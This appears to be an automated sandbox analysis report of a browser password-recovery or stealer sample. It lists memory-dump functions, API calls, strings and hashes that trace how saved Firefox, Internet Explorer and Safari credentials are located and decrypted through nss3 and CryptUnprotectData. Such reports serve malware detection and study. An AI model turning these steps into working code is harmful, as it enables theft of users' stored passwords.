                                                                                                                                                                  • LoadLibraryW.KERNEL32(sqlite3.dll,?,00000000,00000000), ref: 00443BA5
                                                                                                                                                                  • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000000,00000000), ref: 00443BB3
                                                                                                                                                                  • LoadLibraryW.KERNEL32(nss3.dll,?,00000000,00000000), ref: 00443BC3
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00443BF8
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00443C05
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00443C12
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00443C1F
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00443C2C
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00443C39
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00443C46
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
                                                                                                                                                                  • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                                  • API String ID: 2522319644-522817110
                                                                                                                                                                  • Opcode ID: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
                                                                                                                                                                  • Instruction ID: 5ad66febf3ba3de4182efca1dfca8304e8a02b444a88a93b5109a45c6fbe2280
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E5153B1940719AAEB20FFA28D49F47B6E8AF58B04F1109ABE549D2141E77CE644CF18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00418137, Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4218492932-0
                                                                                                                                                                  • Opcode ID: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
                                                                                                                                                                  • Instruction ID: d236c1b17a1aae76216467299f6e18822a0d202c31a727bef5ceca0d2f67f94c
                                                                                                                                                                  • Opcode Fuzzy Hash: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
                                                                                                                                                                  • Instruction Fuzzy Hash: B31184B3D005186BDB00EFA4DC49EDAB7ACEB5A210F454937FA15DB141E638E6448798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417BE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417BF2
                                                                                                                                                                    • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
                                                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C19
                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C42
                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00417C5D
                                                                                                                                                                  • free.MSVCRT(?,0044C838,?), ref: 00417C8B
                                                                                                                                                                    • Part of subcall function 00416D4F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76D25970,?,00416E7A,?), ref: 00416D6D
                                                                                                                                                                    • Part of subcall function 00416D4F: malloc.MSVCRT ref: 00416D74
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                  • String ID: OsError 0x%x (%u)
                                                                                                                                                                  • API String ID: 2360000266-2664311388
                                                                                                                                                                  • Opcode ID: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
                                                                                                                                                                  • Instruction ID: 86e7f975cda22aef79341c94f36a987d619a37d11feed098ff88b3a8796ba2f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
                                                                                                                                                                  • Instruction Fuzzy Hash: BA11B234E01228BBDB11ABA2DD8DCDF7F78EF85750B20005BF40592211E7784A80DBE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408CAC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00408CC4
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408CE3
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00408D03
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                  • String ID: .$1k@$nss3.dll
                                                                                                                                                                  • API String ID: 3541575487-3908353483
                                                                                                                                                                  • Opcode ID: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
                                                                                                                                                                  • Instruction ID: f3d79de5d6fec64b9baa04ebfd9a669330ca9081903d010b6bc69252f5057639
                                                                                                                                                                  • Opcode Fuzzy Hash: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0BB759005246BDF205B64EC4C6ABB7BCFF45365F000176ED06A71C1D7749D458A98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F078, Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                    • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
                                                                                                                                                                    • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
                                                                                                                                                                  • OpenClipboard.USER32 ref: 0040F0B6
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040F0CB
                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040F0EA
                                                                                                                                                                    • Part of subcall function 00407F9A: EmptyClipboard.USER32 ref: 00407FA4
                                                                                                                                                                    • Part of subcall function 00407F9A: GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
                                                                                                                                                                    • Part of subcall function 00407F9A: GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
                                                                                                                                                                    • Part of subcall function 00407F9A: GlobalLock.KERNEL32 ref: 00407FDF
                                                                                                                                                                    • Part of subcall function 00407F9A: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
                                                                                                                                                                    • Part of subcall function 00407F9A: GlobalUnlock.KERNEL32(00000000), ref: 00408004
                                                                                                                                                                    • Part of subcall function 00407F9A: SetClipboardData.USER32 ref: 0040800D
                                                                                                                                                                    • Part of subcall function 00407F9A: CloseHandle.KERNEL32(?), ref: 00408021
                                                                                                                                                                    • Part of subcall function 00407F9A: CloseClipboard.USER32 ref: 00408035
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2633007058-0
                                                                                                                                                                  • Opcode ID: dbdd240ec4c17506c233b057a251f0f9826ab019b5c58cf36240f842d410ce54
                                                                                                                                                                  • Instruction ID: d4411bd4de1fade650879fa69a29e8aba7a0aa0f0e0d1894cd1391532f6ebd18
                                                                                                                                                                  • Opcode Fuzzy Hash: dbdd240ec4c17506c233b057a251f0f9826ab019b5c58cf36240f842d410ce54
                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF0A4357003006BEA3027359C0EF9B375DDB80714F00453AF852A65D3EE79E8898568
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004083A1, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Version
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                  • Opcode ID: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
                                                                                                                                                                  • Instruction ID: e5ecc73df534455334d47becca92420b288d3786a246e23e5c2a841cda36e69b
                                                                                                                                                                  • Opcode Fuzzy Hash: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
                                                                                                                                                                  • Instruction Fuzzy Hash: 17C08C329112208BDB11AB08FE0A7CD72989B0B727F014077E802A2252C7F848048BBC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402316, Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 282COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040233E
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040236E
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040239B
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004023C8
                                                                                                                                                                    • Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
                                                                                                                                                                    • Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75
                                                                                                                                                                  • memset.MSVCRT ref: 0040276C
                                                                                                                                                                  • memcpy.MSVCRT ref: 004027A1
                                                                                                                                                                    • Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
                                                                                                                                                                    • Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
                                                                                                                                                                    • Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD
                                                                                                                                                                  • memcpy.MSVCRT ref: 004027FD
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040285B
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040286A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
                                                                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                  • API String ID: 462158748-1134094380
                                                                                                                                                                  • Opcode ID: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
                                                                                                                                                                  • Instruction ID: 2d0d0591d6411435ed5b4a397348faa82e1f821ad6e98c1f3977ba2ad668a768
                                                                                                                                                                  • Opcode Fuzzy Hash: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
                                                                                                                                                                  • Instruction Fuzzy Hash: FBF1F2218087E9C9DB32C7788C097DEBE655B23324F0443D9D1E87A2D2D7B94B85CB66
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AA82, Relevance: 59.8, APIs: 27, Strings: 7, Instructions: 275stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                  • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                                                                                                                                                  • API String ID: 2787044678-1843504584
                                                                                                                                                                  • Opcode ID: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
                                                                                                                                                                  • Instruction ID: f322a3b8e7f5a6d162087a7bfffa82d5495360e728e73a59fe9151b9b78652c6
                                                                                                                                                                  • Opcode Fuzzy Hash: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8191B271500219ABEF20DF55CC45FEF776DAF91314F01046AF948A7181EA3CEDA48B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004136DC, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                                                                  • Opcode ID: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
                                                                                                                                                                  • Instruction ID: eaed71e83b935c0691042ece96cd3f4181ba93c5b62309cd5e6c1ba419c0f7d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
                                                                                                                                                                  • Instruction Fuzzy Hash: 8AB1CE71108701AFDB21DFA8C985A6BBBF9FB88704F004A2EF59582261DB75E904CF56
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040109F, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                  • String ID: WebBrowserPassView
                                                                                                                                                                  • API String ID: 829165378-2171583229
                                                                                                                                                                  • Opcode ID: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
                                                                                                                                                                  • Instruction ID: da1635bf63897f0d85a147e608c4a0468d220b7f7222c61bbc2b07ca64c81474
                                                                                                                                                                  • Opcode Fuzzy Hash: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
                                                                                                                                                                  • Instruction Fuzzy Hash: 4751BF34500B08EBDF22AF60CC45E6E7BB5FB04341F104A3AF952A65F1C7B9A950EB18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040716C, Relevance: 42.2, APIs: 11, Strings: 13, Instructions: 221COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040AE5E: GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
                                                                                                                                                                    • Part of subcall function 0040AE5E: CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC
                                                                                                                                                                    • Part of subcall function 0040AF0C: _wcsicmp.MSVCRT ref: 0040AF46
                                                                                                                                                                  • memset.MSVCRT ref: 004071FD
                                                                                                                                                                  • memset.MSVCRT ref: 00407212
                                                                                                                                                                  • _wtoi.MSVCRT ref: 00407306
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0040731A
                                                                                                                                                                  • memset.MSVCRT ref: 0040733B
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?), ref: 0040736F
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00407386
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040739D
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073B4
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073CB
                                                                                                                                                                    • Part of subcall function 00407150: _wtoi64.MSVCRT ref: 00407154
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073E2
                                                                                                                                                                    • Part of subcall function 00406FCE: memset.MSVCRT ref: 00406FF4
                                                                                                                                                                    • Part of subcall function 00406FCE: memset.MSVCRT ref: 00407008
                                                                                                                                                                    • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
                                                                                                                                                                    • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
                                                                                                                                                                    • Part of subcall function 00406FCE: strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
                                                                                                                                                                    • Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
                                                                                                                                                                    • Part of subcall function 00406FCE: wcscpy.MSVCRT ref: 0040709D
                                                                                                                                                                    • Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
                                                                                                                                                                    • Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$memset$strcpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$logins$null$passwordField$timeCreated$timeLastUsed$timePasswordChanged$timesUsed$usernameField${@
                                                                                                                                                                  • API String ID: 249851626-1964116028
                                                                                                                                                                  • Opcode ID: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
                                                                                                                                                                  • Instruction ID: c3ecdf3b596e70815539cea729ffc079dd9e4b065ea23c8e33f814b0aa12875c
                                                                                                                                                                  • Opcode Fuzzy Hash: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
                                                                                                                                                                  • Instruction Fuzzy Hash: 48717FB1D40219AEEF10EBA2DC82DEEB778EF40318F1041BBB514B61D1DA785E548F69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004113C8, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0041166F
                                                                                                                                                                  • {Unknown}, xrefs: 00411492
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                                                  • Opcode ID: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
                                                                                                                                                                  • Instruction ID: 77b13c0c11c75301577e42814f96b51b4b1d428f570956a2458bc96a91f7f52b
                                                                                                                                                                  • Opcode Fuzzy Hash: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
                                                                                                                                                                  • Instruction Fuzzy Hash: A17193B280021CBFEF219B51DD45EDA376DEB49355F04407BF608A2162EB79DE848F68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00411760, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00411781
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
                                                                                                                                                                  • memset.MSVCRT ref: 004117F1
                                                                                                                                                                  • wcslen.MSVCRT ref: 004117FE
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041180D
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 004118CC
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 004118D8
                                                                                                                                                                    • Part of subcall function 00406B51: memset.MSVCRT ref: 00406B72
                                                                                                                                                                    • Part of subcall function 00406B51: memset.MSVCRT ref: 00406BBF
                                                                                                                                                                    • Part of subcall function 00406B51: RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
                                                                                                                                                                    • Part of subcall function 00406B51: wcscpy.MSVCRT ref: 00406D07
                                                                                                                                                                    • Part of subcall function 00406B51: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
                                                                                                                                                                    • Part of subcall function 00406B51: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                                                                                                                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                  • API String ID: 2554026968-4029219660
                                                                                                                                                                  • Opcode ID: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
                                                                                                                                                                  • Instruction ID: 97ddbdf8ae905254a000a89cdfb80c97087349b9056a3f7eb9cac2f120fabdad
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
                                                                                                                                                                  • Instruction Fuzzy Hash: D2419271940308ABDB20AF61CC85E9AB7F8FF58344F10486FE295D3151EBB8D9848B5C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407991, Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00411760: memset.MSVCRT ref: 00411781
                                                                                                                                                                    • Part of subcall function 00411760: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
                                                                                                                                                                    • Part of subcall function 00411760: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
                                                                                                                                                                    • Part of subcall function 00411760: memset.MSVCRT ref: 004117F1
                                                                                                                                                                    • Part of subcall function 00411760: wcslen.MSVCRT ref: 004117FE
                                                                                                                                                                    • Part of subcall function 00411760: wcslen.MSVCRT ref: 0041180D
                                                                                                                                                                    • Part of subcall function 00411760: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
                                                                                                                                                                    • Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
                                                                                                                                                                    • Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
                                                                                                                                                                    • Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
